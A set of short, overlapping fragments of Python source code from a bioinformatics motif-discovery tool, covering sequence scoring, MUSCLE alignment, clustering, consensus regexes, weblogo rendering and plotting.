"time.time() subarrays_item = p.get() subarrays_items += subarrays_item d_time = time.time() - start_time d_loc_time",
"(begin, end) header += '<score>%.4f<score>' % (score) header += '<subseq>%s<subseq>' % (subseq_seq) subseq",
"= vectorizer.annotate(iterable, estimator=estimator) scores = [score for seq, score in annotated_seqs] return scores",
"from Bio import SeqIO from Bio.Align.Applications import MuscleCommandline from Bio.Alphabet import IUPAC from",
"if self.diags is True: params['diags'] = True if self.maxhours is not None: params['maxhours']",
"code_str = '(' + '|'.join(code) + ')' return code_str def consensus_regex(trimmed_align_seqs, regex_th): \"\"\"consensus_regex.\"\"\"",
"end = tokens[1].split(':') yield (seq_id, int(begin), int(end), i) def compute_cooccurence(motives, ids=None): \"\"\"compute_cooccurence.\"\"\" if",
"iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def _order_clusters(self, clusters, complexity=3): sep =",
"%s (%.2f secs) (delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() preds",
"std_loc = np.percentile(locs, 70) - np.percentile(locs, 30) else: avg_loc = -1 std_loc =",
"block_size=100, n_jobs=-1): \"\"\"multiprocess_score.\"\"\" start_time = time.time() if n_jobs == -1: pool = mp.Pool()",
"2 locs.append(m) if locs: avg_loc = np.percentile(locs, 50) std_loc = np.percentile(locs, 70) -",
"% (val, start, end, width)) for h, s in seqs: if s[start:end]: yield",
"= c.most_common() code = '' for i, row in enumerate(cluster.T): c = Counter(row)",
"self.maxhours muscle_cline = MuscleCommandline(**params) stdout, stderr = muscle_cline(stdin=data) return stdout def _fasta_to_seqs(self, headers,",
"'|'.join(code) + ')' return code_str def consensus_regex(trimmed_align_seqs, regex_th): \"\"\"consensus_regex.\"\"\" cluster = [] for",
"plt.grid() plt.title(needle) plt.xlabel('Position') plt.ylabel('Num occurrences') if fname: plt.draw() figname = '%s_loc_%d.png' % (fname,",
"min_cluster_size logger.debug('Alignment') motives = dict() for cluster_id in clusters: start_time = time.time() #",
"margin=1, output='all') subseqs = [] for subarray in subarrays: subseq_seq = subarray['subarray_string'] begin",
"y = np.array(y) true_targets.append(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) pred = estimator.decision_function(data_matrix) preds.append(pred) binary_pred",
"(cluster_id, len(clusters[cluster_id]), dtime)) logger.debug('After motives computation, %d motives' % len(motives)) return motives def",
"wbl.jpeg_formatter(data, format) else: return wbl.eps_formatter(data, format) # ------------------------------------------------------------------------------ class SequenceMotifDecomposer(BaseEstimator, ClassifierMixin): \"\"\"SequenceMotifDecomposer.\"\"\" def",
"start, end, width = max(box_decomposition(sig, half_windw_size)) logger.debug('val:%.1f beg:%s end:%s width:%s' % (val, start,",
"100%\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname + '\" style=\"width: 100%\"></p>') else: if",
"motives=None, freq_th=None, std_th=None): \"\"\"quality_filter.\"\"\" _motives = dict() for cluster_id in motives: regex_seq =",
"if count / float(size) > regex_th: if letter != '-': code.append(letter) if len(code)",
"regex_i, j, regex_j, len(ds)) txt.append(info) if len(ds): figname = plot_distance( cluster_id, j, regex_i,",
"from StringIO import StringIO from Bio import SeqIO from Bio.Align.Applications import MuscleCommandline from",
"score') if fname: plt.draw() figname = '%s_importance.png' % (fname) plt.savefig( figname, bbox_inches='tight', transparent=True,",
"= n.get() y += [-1] * neg_data_matrix.shape[0] y = np.array(y) true_targets.append(y) data_matrix =",
"sequence_type='dna', # ['protein','dna','rna'] ignore_lower_case=False, # ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability'] units='bits', first_position=1, logo_range=list(), # composition = 'auto',",
"options.logo_start = logo_range[0] options.logo_end = logo_range[1] options.scale_width = scale_stack_widths options.show_errorbars = error_bars if",
"')[0].split('>')[1]) motif_seqs[id] = out[i + 1] return zip(headers, motif_seqs) def transform(self, seqs=[]): \"\"\"Carry",
"self.b = -4, 1 scores = [score for header, score, begin, end, subseq",
"time.time() matrices = [] for i, p in enumerate(results): loc_start_time = time.time() pos_data_matrix",
"for h, align_seq in align_seqs: trimmed_align_seq = [a for i, a in enumerate(align_seq)",
"src=\"file://' + url + '\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname + '\"></p>')",
"dont interfere cluster_seqs = [] for cluster_id in clusters: if len(clusters[cluster_id]) > 0:",
"self.compute_logo( cluster_id=cluster_id, motif=motives[cluster_id]) logos[cluster_id] = (logo_image, logo_txt) return logos else: logger.warning( 'No logo",
"txt.append(logo_txt) co = motives[cluster_id]['counts'] fr = motives[cluster_id]['freq'] info = ' - num occurrences",
"begin, end = tokens[1].split(':') yield (seq_id, int(begin), int(end), i) def compute_cooccurence(motives, ids=None): \"\"\"compute_cooccurence.\"\"\"",
"class definition logger.debug('After merge, %d motives' % len(motives)) return motives def quality_filter(self, seqs=None,",
"cluster.append(concat_str) cluster = np.vstack(cluster) size = len(trimmed_align_seqs) for i, row in enumerate(cluster.T): c",
"= IUPAC.unambiguous_rna else: self.alphabet = IUPAC.unambiguous_dna def _seq_to_stdin_fasta(self, seqs): # seperating headers headers,",
"motives motives[i] = motif del motives[j] success = True if success is False:",
"x in zip(*seqs)] if self.options.sequence_type is 'rna': alphabet = Alphabet('ACGU') elif self.options.sequence_type is",
"motives: regex_seq = motives[cluster_id]['regex_seq'] counts, freq = occurrences(regex_seq, seqs) motives[cluster_id]['freq'] = freq motives[cluster_id]['counts']",
"= consensus_regex(motives[id]['trimmed_align_seqs'], regex_th) counts, freq = occurrences(c_regex, seqs) yield freq, id, c_regex, counts,",
"s in motives[i]['seqs']: tokens = h.split('<loc>') seq_id = tokens[0] begin, end = tokens[1].split(':')",
"i in hits(motives, ids=ids): seqs_summary[seq_id].append((begin, end, i)) distances = defaultdict(list) size = max(id",
"+ 1] return zip(headers, motif_seqs) def transform(self, seqs=[]): \"\"\"Carry out alignment.\"\"\" headers, data",
">= 0] = 0 plt.bar(range(len(sign)), sign, alpha=0.3, color='r') plt.grid() plt.xlabel('Position') plt.ylabel('Importance score') if",
"instances = [list(x) for x in zip(*seqs)] instances_seqrecord = [] for i, j",
"p, subseq in iterable: new_header = header new_header += '<loc>' + str(begin) +",
"= clusterer self.clusterer_is_fit = False def save(self, model_name): \"\"\"save.\"\"\" joblib.dump(self, model_name, compress=1) def",
"+= str(end) + '<loc>' subsequences.append((new_header, subseq)) if not subsequences: raise Exception('No subarray was",
"motif = self.compute_motif( seqs=clusters[cluster_id], min_score=min_score, min_freq=min_freq, min_cluster_size=mcs, regex_th=regex_th, sample_size=sample_size) if is_high_quality: motives[cluster_id] =",
"= motif del motives[j] success = True if success is False: break #",
"header += '<subseq>%s<subseq>' % (subseq_seq) subseq = (header, seq) subseqs.append(subseq) subarrays_items += subseqs",
"start, end, width)) for h, s in seqs: if s[start:end]: yield (h, s[start:end])",
"= vstack([pos_data_matrix, neg_data_matrix]) estimator.partial_fit(data_matrix, y, classes=classes) d_time = time.time() - start_time d_loc_time =",
"std <= std_th: _motives[cluster_id] = motives[cluster_id] if len(_motives) == 0: logger.warning('Quality filter is",
"float(len(xs)) return xs, ys def letter_regex(k, size, regex_th=0.3): \"\"\"letter_regex.\"\"\" code = [] for",
"logger.warning( 'No motives to report. Try more permissive parameters.') txt = '\\n'.join(txt) return",
"min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items: components = self._decompose_header(header) orig_header,",
"Counter(row) k = c.most_common() code = '' for i, row in enumerate(cluster.T): c",
"for h, s in motives[i]['seqs']: tokens = h.split('<loc>') seq_id = tokens[0] begin, end",
"median_len: logger.debug('Length mismatch: %d != %d' % (len(sig), median_len)) if sigs is None:",
"instances_seqrecord = [] for i, j in enumerate(instances): instances_seqrecord.append( SeqRecord(Seq(j, self.alphabet), id=str(i))) handle",
"n_jobs=-1): \"\"\"multiprocess_subarray.\"\"\" start_time = time.time() if n_jobs == -1: pool = mp.Pool() else:",
"try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header,",
"\"\"\"Initialize an instance.\"\"\" self.diags = diags self.maxiters = maxiters self.maxhours = maxhours if",
"time.time() self.clusterer.set_params(n_clusters=self.n_clusters) if self.clusterer_is_fit: preds = self.class_estimator.predict(data_matrix) else: preds = self.clusterer.fit_predict(data_matrix) self.class_estimator.fit(data_matrix, preds)",
"\"\"\"Initialize an instance.\"\"\" options = wbl.LogoOptions() options.stacks_per_line = stacks_per_line options.sequence_type = sequence_type options.ignore_lower_case",
"e) logger.debug('Exception', exc_info=True) def decomposition_scores(self, seqs=None): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer,",
"if len(ds): figname = plot_distance( cluster_id, j, regex_i, regex_j, distances, nbins=nbins, size=size, fname=fname)",
"Reason: %s' % e) logger.debug('Exception', exc_info=True) def _decompose_header(self, header): score = header.split('<score>')[1] score",
"Alphabet, SeqList import weblogolib as wbl from scipy.cluster.hierarchy import linkage import regex as",
"i, p in enumerate(results): loc_start_time = time.time() scores = p.get() scores_items += scores",
"in smod.score(seqs): sig = np.array(scores) if len(sig) != median_len: logger.debug('Length mismatch: %d !=",
"def compute_motives(self, clusters, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motives.\"\"\" if not clusters: raise",
"merge(self, motives, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"merge.\"\"\" while True: ms =",
"new_header += '<loc>' + str(begin) + ':' new_header += str(end) + '<loc>' subsequences.append((new_header,",
"ids=None): \"\"\"compute_cooccurence.\"\"\" if ids is None: ids = [id for id in motives]",
"yield self._decompose_header(header) except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception',",
"ignore_lower_case options.unit_name = units options.first_index = first_position if logo_range: options.logo_start = logo_range[0] options.logo_end",
"l = letter_regex(k, size, regex_th=regex_th) if l: code += l return code def",
"multiprocessing as mp import os from collections import defaultdict from eden import apply_async",
"start_time = time.time() if n_jobs == -1: pool = mp.Pool() else: pool =",
"p in enumerate(results): loc_start_time = time.time() subarrays_item = p.get() subarrays_items += subarrays_item d_time",
"self.n_clusters = n_clusters self.min_subarray_size = min_subarray_size self.max_subarray_size = max_subarray_size self.pos_block_size = pos_block_size self.neg_block_size",
"= [] for h, align_seq in align_seqs: trimmed_align_seq = [a for i, a",
"= subarray['end'] score = subarray['score'] header = orig_header header += '<loc>%d:%d<loc>' % (begin,",
"%.2f secs' % (time.time() - start_time)) logger.debug('Vectorizing') start_time = time.time() matrices = []",
"y return p_val def ecdf(x): \"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x) ys",
"fname: plt.draw() figname = '%s_dist_%d_vs_%d.png' % (fname, cluster_id_i, cluster_id_j) plt.savefig( figname, bbox_inches='tight', transparent=True,",
"if id2 < len(cluster_seqs): orders.append(int(id2)) return orders def _compute_consensus_seq(self, align_seqs): cluster = []",
"not in to_be_removed] trimmed_align_seqs.append((h, ''.join(trimmed_align_seq))) return score, trimmed_align_seqs def _is_high_quality(self, seqs, min_score=4, min_freq=0.6,",
"= mp.Pool(n_jobs) results = [apply_async( pool, serial_score, args=(seqs, vectorizer, estimator)) for seqs in",
"begin = subarray['begin'] end = subarray['end'] score = subarray['score'] header = orig_header header",
"freq, cluster_id in sorted([(motives[i]['freq'], i) for i in motives], reverse=True): info = '",
"num co-occurences %d %s vs %d %s: %d' % \\ (cluster_id, regex_i, j,",
"if norm != 0: row /= norm else: row = np.zeros(row.shape) row[i] =",
"pos_data_matrix.shape[0] neg_data_matrix = n.get() y += [-1] * neg_data_matrix.shape[0] y = np.array(y) true_targets.append(y)",
"# ------------------------------------------------------------------------------ def _fasta_to_fasta(lines): seq = \"\" for line in lines: if line:",
"in motives] seqs_summary = defaultdict(list) for seq_id, begin, end, i in hits(motives, ids=ids):",
"'No logo to compute. Try more permissive parameters.') def _save_logo(self, logo, cluster_id, fname):",
"0: row /= norm else: row = np.zeros(row.shape) row[i] = 0 cooccurence_list.append(row) norm_cooccurence_mtx",
"- s) / 2 locs.append(m) plt.figure(figsize=size) n, bins, patches = plt.hist( locs, nbins,",
"self._decompose_header(header) except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True)",
"end = loc.split(':') begin = int(begin) end = int(end) subseq = header.split('<subseq>')[1] orig_header",
"logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def fit_decomposition(self, seqs=None): \"\"\"fit_decomposition.\"\"\" self.a,",
"enumerate(results): loc_start_time = time.time() subarrays_item = p.get() subarrays_items += subarrays_item d_time = time.time()",
"seqs, size=(6, 2), fname=None): \"\"\"plot_cumulative_score.\"\"\" sig = cumulative_score(seqs, smod) plt.figure(figsize=size) sigp = np.copy(sig)",
"= [] for i, p in enumerate(results): loc_start_time = time.time() pos_data_matrix = p.get()",
"args=(seqs, vectorizer, estimator, min_subarray_size, max_subarray_size)) for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs'",
"e) logger.debug('Exception', exc_info=True) def score(self, seqs=None): \"\"\"fit.\"\"\" try: for score in multiprocess_score(seqs, vectorizer=self.vectorizer,",
"cluster = np.vstack(cluster) size = len(trimmed_align_seqs) for i, row in enumerate(cluster.T): c =",
"{'maxiters': 7} if self.diags is True: params['diags'] = True if self.maxhours is not",
"txt.append(info) av = motives[cluster_id]['avg_pos'] st = motives[cluster_id]['std_pos'] info = ' - average location:",
"loc.split(':') begin = int(begin) end = int(end) subseq = header.split('<subseq>')[1] orig_header = header.split('<loc>')[0]",
"\"\"\"serial_pre_process.\"\"\" data_matrix = vectorizer.transform(iterable) return data_matrix def chunks(iterable, n): \"\"\"chunks.\"\"\" iterable = iter(iterable)",
"clusters, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motives.\"\"\" if not clusters: raise Exception('Error: No",
"c.most_common() if k[0][0] == '-': to_be_removed.append(i) val = k[1][1] else: val = k[0][1]",
"= [] for letter, count in k: if count / float(size) > regex_th:",
"'-': code.append(letter) if len(code) == 0: code_str = None elif len(code) == 1:",
"= np.vstack(cluster) size = len(trimmed_align_seqs) for i, row in enumerate(cluster.T): c = Counter(row)",
"(e - s) / 2 locs.append(m) plt.figure(figsize=size) n, bins, patches = plt.hist( locs,",
"= pos_data_matrix.shape logger.debug('%d %s (%.2f secs) (delta: %.2f)' % (i, size, d_time, d_loc_time))",
"code_str def consensus_regex(trimmed_align_seqs, regex_th): \"\"\"consensus_regex.\"\"\" cluster = [] for h, align_seq in trimmed_align_seqs:",
"logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b)) def compute_p_value(self, value): \"\"\"p_value.\"\"\" y =",
"bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show() plt.close() return figname # ------------------------------------------------------------------------------",
"j, regex_i, regex_j, distances, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image( figname, output_type=output_type)) txt.append('_' * 100)",
"= self._fasta_to_seqs(headers, stdout) return aligned_seqs # ------------------------------------------------------------------------------ class Weblogo(object): \"\"\"A wrapper of weblogolib",
"logo_txt in logo_txts: txt.append(logo_txt) co = motives[cluster_id]['counts'] fr = motives[cluster_id]['freq'] info = '",
"norm else: row = np.zeros(row.shape) row[i] = 0 cooccurence_list.append(row) norm_cooccurence_mtx = np.vstack(cooccurence_list) return",
"subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq",
"maxiters=16, maxhours=None, # TODO: check if this alphabet is required # it over-rides",
"if ids is None: ids = [cluster_id for cluster_id in motives] logos =",
"ids=ids): seqs_summary[seq_id].append((begin, end, i)) distances = defaultdict(list) size = max(id for id in",
"headers, instances = [list(x) for x in zip(*seqs)] if self.options.sequence_type is 'rna': alphabet",
"logger.info('Classification:') logger.info(metrics.classification_report(y_test, y_binary)) # roc logger.info('ROC: %.3f' % (metrics.roc_auc_score(y_test, y_pred))) except Exception as",
"distribution function.\"\"\" xs = np.sort(x) ys = np.arange(1, len(xs) + 1) / float(len(xs))",
"trimmed_align_seqs: str_list = [c for c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str)",
"for i in motives: for j in motives: if j > i: seq_i",
"= [] true_targets = [] for i, (p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time",
"def predict(self, value): \"\"\"pvalue.\"\"\" y = sigmoid(value, self.a, self.b) p_val = 1 -",
"np.vstack(cooccurence_list) return orig_cooccurence_mtx, norm_cooccurence_mtx, distances def plot_distance(cluster_id_i, cluster_id_j, regex_i, regex_j, distances, nbins=5, size=(6,",
"sig = np.array(sigs) / float(len(seqs)) return sig def trim_seqs(seqs, smod, half_windw_size=7): \"\"\"trim_seqs.\"\"\" sig",
"[] for (orig_header, orig_seq), (seq, score) in zip(iterable, annotated_seqs): subarrays = compute_max_subarrays_sequence( seq=seq,",
"= len(align_seqs) cluster = [] for h, align_seq in align_seqs: str_list = [c",
"cluster_id=None, motif=None): \"\"\"compute_logo.\"\"\" alphabet = 'rna' color_scheme = 'classic' wb = Weblogo(output_format='png', sequence_type=alphabet,",
"true_targets = [] for i, (p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time = time.time()",
"header.split('<loc>')[0] return orig_header, score, begin, end, subseq def decompose(self, seqs=None, p_value=0.05): \"\"\"decomposition_scores.\"\"\" try:",
"concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) seq = '' for i,",
"%d' % (len(sig), median_len)) if sigs is None: if len(sig) >= median_len: sigs",
"for i, p in enumerate(results): loc_start_time = time.time() subarrays_item = p.get() subarrays_items +=",
"= defaultdict(list) size = max(id for id in motives) + 1 cooccurence_mtx =",
"self except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True)",
"logo_range[0] options.logo_end = logo_range[1] options.scale_width = scale_stack_widths options.show_errorbars = error_bars if title: options.title",
"cluster_id in sorted([(motives[i]['freq'], i) for i in motives], reverse=True): info = ' -",
"+ (end - begin) / 2) cluster_ids = set(cluster_ids) for i in cluster_ids:",
"= [apply_async( pool, serial_score, args=(seqs, vectorizer, estimator)) for seqs in chunks(iterable, block_size)] logger.debug('Setup",
"corebio.seq import Alphabet, SeqList import weblogolib as wbl from scipy.cluster.hierarchy import linkage import",
"motives def quality_filter(self, seqs=None, motives=None, freq_th=None, std_th=None): \"\"\"quality_filter.\"\"\" _motives = dict() for cluster_id",
"% e) logger.debug('Exception', exc_info=True) def _decompose_header(self, header): score = header.split('<score>')[1] score = float(score)",
"return stdout def _fasta_to_seqs(self, headers, stdout): out = list(_fasta_to_fasta(stdout.split('\\n'))) motif_seqs = [''] *",
"max_subarray_size=max_subarray_size, margin=1, output='all') subseqs = [] for subarray in subarrays: subseq_seq = subarray['subarray_string']",
"seqs_summary = defaultdict(list) for seq_id, begin, end, i in hits(motives, ids=ids): seqs_summary[seq_id].append((begin, end,",
"(%.2f secs) (delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() return estimator",
"secs) (delta: %.2f)' % (i, d_time, d_loc_time)) pool.close() pool.join() return subarrays_items def serial_score(iterable,",
"id=str(i))) handle = StringIO() SeqIO.write(instances_seqrecord, handle, \"fasta\") data = handle.getvalue() return headers, data",
"# composition = 'auto', scale_stack_widths=True, error_bars=True, title='', figure_label='', show_x_axis=True, x_label='', show_y_axis=True, y_label='', y_axis_tic_spacing=1.0,",
"SeqIO from Bio.Align.Applications import MuscleCommandline from Bio.Alphabet import IUPAC from Bio.Seq import Seq",
"False def compute_motif(self, seqs=None, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motif.\"\"\" ma = MuscleAlignWrapper(alphabet='rna')",
"= sum(sig[start:end]) yield val, start, end, width def cumulative_score(seqs, smod): \"\"\"cumulative_score.\"\"\" median_len =",
"= '%s_logo_cl_%d.png' % (fname, cluster_id) with open(imagename, 'wb') as f: f.write(logo) return imagename",
"self.compute_clusters(seqs, p_value=p_value) motives = self.compute_motives( orig_clusters, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives =",
"- consensus sequence: %s' % motif['consensus_seq'] logo_txt.append(info) info = ' - consensus regex:",
"1 def ecdf(self, x): \"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x) ys =",
"as mp import os from collections import defaultdict from eden import apply_async import",
"= np.vstack(cluster) seq = '' for i, row in enumerate(cluster.T): c = Counter(row)",
"plt.figure(figsize=size) n, bins, patches = plt.hist( ds, nbins, normed=0, facecolor='green', alpha=0.3) plt.grid() plt.title('%s",
"------------------------------------------------------------------------------ def _fasta_to_fasta(lines): seq = \"\" for line in lines: if line: if",
"seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items: yield",
"is None: if len(sig) >= median_len: sigs = sig[:median_len] else: if len(sig) >=",
"for m in self._identify_mergeable_clusters( motives, similarity_th=similarity_th)], reverse=True) success = False for rel_nw_score, i,",
"\"\"\"serial_score.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) scores = [score for seq, score in annotated_seqs]",
"find closest instance j from any instance in i d_ij = [] for",
"logger.warning( 'No logo to compute. Try more permissive parameters.') def _save_logo(self, logo, cluster_id,",
"time.time() - start_time d_loc_time = time.time() - loc_start_time logger.debug('%d (%.2f secs) (delta: %.2f)'",
"b:%.2f' % (self.a, self.b)) def compute_p_value(self, value): \"\"\"p_value.\"\"\" y = sigmoid(value, self.a, self.b)",
"defaultdict(list) for seq_id, begin, end, i in hits(motives, ids=ids): seqs_summary[seq_id].append((begin, end, i)) distances",
"= [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f",
"if min_sig == sig[i]: yield i def box_decomposition(sig, half_windw_size=5): \"\"\"box_decomposition.\"\"\" ids = list(mean_shift_decomposition(sig,",
"[] for i, j in enumerate(instances): instances_seqrecord.append( SeqRecord(Seq(j, self.alphabet), id=str(i))) handle = StringIO()",
"c.most_common() l = letter_regex(k, size, regex_th=regex_th) if l: code += l return code",
"plt.ylabel('Num occurrences') if fname: plt.draw() figname = '%s_loc_%d.png' % (fname, cluster_id) plt.savefig( figname,",
"n_jobs=-1): \"\"\"multiprocess_vectorize.\"\"\" start_time = time.time() if n_jobs == -1: pool = mp.Pool() else:",
"in enumerate(cluster.T): c = Counter(row) k = c.most_common() l = letter_regex(k, size, regex_th=regex_th)",
"sigmoid on the empirical cumulative distribution.\"\"\" def __init__(self, random_state=1): \"\"\"Constructor.\"\"\" self.random_state = random_state",
"motives[cluster_id]['avg_pos'] = avg motives[cluster_id]['std_pos'] = std if freq_th is None or freq >=",
"s) / 2 locs.append(m) if locs: avg_loc = np.percentile(locs, 50) std_loc = np.percentile(locs,",
"def fit_decomposition(self, seqs=None): \"\"\"fit_decomposition.\"\"\" self.a, self.b = -4, 1 scores = [score for",
"txt.append(self._wrap_image(figname, output_type=output_type)) for j in motives: regex_i = motives[i]['regex_seq'] if j != cluster_id:",
"def ecdf(self, x): \"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x) ys = np.arange(1,",
"alpha=0.3) plt.grid() plt.title(needle) plt.xlabel('Position') plt.ylabel('Num occurrences') if fname: plt.draw() figname = '%s_loc_%d.png' %",
"seqs_summary[seq_id]] centers = defaultdict(list) for begin, end, cluster_id in seqs_summary[seq_id]: centers[cluster_id].append(begin + (end",
"txt.append('<p align=\"left\"><img src=\"' + fname + '\"></p>') return '\\n'.join(txt) def report(self, pos_seqs, all_seqs,",
"regex_th=regex_th, sample_size=sample_size) motives = self.quality_filter( seqs, motives, freq_th=freq_th, std_th=std_th) return motives def compute_logo(self,",
"normed=0, facecolor='green', alpha=0.3) plt.grid() plt.title('%s vs %s' % (regex_i, regex_j)) plt.xlabel('Relative position') plt.ylabel('Num",
"as plt import joblib from scipy.optimize import curve_fit import multiprocessing logger = logging.getLogger(__name__)",
"multiprocess_fit( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) self.fit_decomposition(neg_seqs) return self except Exception",
"vectorizer, estimator)) for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time() -",
"txt.append(self._wrap_image(figname, fill_width=False, output_type=output_type)) regex_i = motives[cluster_id]['regex_seq'] figname = plot_location( regex_i, all_seqs, cluster_id=cluster_id, nbins=nbins,",
"seperate headers headers, instances = [list(x) for x in zip(*seqs)] if self.options.sequence_type is",
"Bio.SeqRecord import SeqRecord from corebio.seq import Alphabet, SeqList import weblogolib as wbl from",
"pool.close() pool.join() return estimator def multiprocess_performance(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_performance.\"\"\"",
"vectorizer=None, pos_block_size=100, n_jobs=-1): \"\"\"multiprocess_vectorize.\"\"\" start_time = time.time() if n_jobs == -1: pool =",
"plt.figure(figsize=size) n, bins, patches = plt.hist( locs, nbins, normed=0, facecolor='blue', alpha=0.3) plt.grid() plt.title(needle)",
"else: txt.append('<p align=\"left\"><img src=\"' + fname + '\" style=\"width: 100%\"></p>') else: if output_type",
"pos_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Vectorizing') start_time = time.time() matrices",
"for i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common() code =",
"annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) subarrays_items = [] for (orig_header, orig_seq), (seq, score) in",
"= plot_cumulative_score( self, pos_seqs, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for freq, cluster_id in sorted([(motives[i]['freq'],",
"= self.compute_clusters(seqs, p_value=p_value) motives = self.compute_motives( orig_clusters, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives",
"for header, begin, end, p, subseq in iterable: new_header = header new_header +=",
"preds) self.clusterer_is_fit = True dtime = time.time() - start_time logger.debug('...done in %.2f secs'",
"min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"merge.\"\"\" while True: ms = sorted([m for m",
"seqs=None, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motif.\"\"\" ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) >",
"= int(begin) end = int(end) subseq = header.split('<subseq>')[1] orig_header = header.split('<loc>')[0] return orig_header,",
"for i in range(len(out[:-1]))[::2]: id = int(out[i].split(' ')[0].split('>')[1]) motif_seqs[id] = out[i + 1]",
"if self.options.sequence_type is 'rna': alphabet = Alphabet('ACGU') elif self.options.sequence_type is 'protein': alphabet =",
"'<loc>' + str(begin) + ':' new_header += str(end) + '<loc>' subsequences.append((new_header, subseq)) if",
"beg:%s end:%s width:%s' % (val, start, end, width)) for h, s in seqs:",
"ms: if motives.get(i, None) and motives.get(j, None): n_i = len(motives[i]['seqs']) n_j = len(motives[j]['seqs'])",
"= False def save(self, model_name): \"\"\"save.\"\"\" joblib.dump(self, model_name, compress=1) def load(self, obj): \"\"\"load.\"\"\"",
"def serial_pre_process(iterable, vectorizer=None): \"\"\"serial_pre_process.\"\"\" data_matrix = vectorizer.transform(iterable) return data_matrix def chunks(iterable, n): \"\"\"chunks.\"\"\"",
"len(xs) + 1) / float(len(xs)) return xs, ys def fit(self, scores): \"\"\"fit.\"\"\" if",
"= [list(x) for x in zip(*seqs)] if self.options.sequence_type is 'rna': alphabet = Alphabet('ACGU')",
"p.get() y = [1] * pos_data_matrix.shape[0] neg_data_matrix = n.get() y += [-1] *",
"logger.info(cm) # classification logger.info('Classification:') logger.info(metrics.classification_report(y_test, y_binary)) # roc logger.info('ROC: %.3f' % (metrics.roc_auc_score(y_test, y_pred)))",
"= avg motives[cluster_id]['std_pos'] = std if freq_th is None or freq >= freq_th:",
"len(ds): figname = plot_distance( cluster_id, j, regex_i, regex_j, distances, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image(",
"self.fit_decomposition(neg_seqs) return self except Exception as e: logger.debug('Failed iteration. Reason: %s' % e)",
"info = ' - num co-occurences %d %s vs %d %s: %d' %",
"+= k[0][0] return seq def _compute_score(self, align_seqs, min_freq=0.8): dim = len(align_seqs) cluster =",
"std_th: _motives[cluster_id] = motives[cluster_id] if len(_motives) == 0: logger.warning('Quality filter is too strict.",
"subseq in self.decomposition_scores(seqs)] if scores: xs, ys = ecdf(scores) popt, pcov = curve_fit(sigmoid,",
"sequence.\"\"\" def __init__(self, output_format='png', # ['eps','png','png_print','jpeg'] stacks_per_line=40, sequence_type='dna', # ['protein','dna','rna'] ignore_lower_case=False, # ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability']",
"plt.xlabel('Relative position') plt.ylabel('Num occurrences') if fname: plt.draw() figname = '%s_dist_%d_vs_%d.png' % (fname, cluster_id_i,",
"= stacks_per_line options.sequence_type = sequence_type options.ignore_lower_case = ignore_lower_case options.unit_name = units options.first_index =",
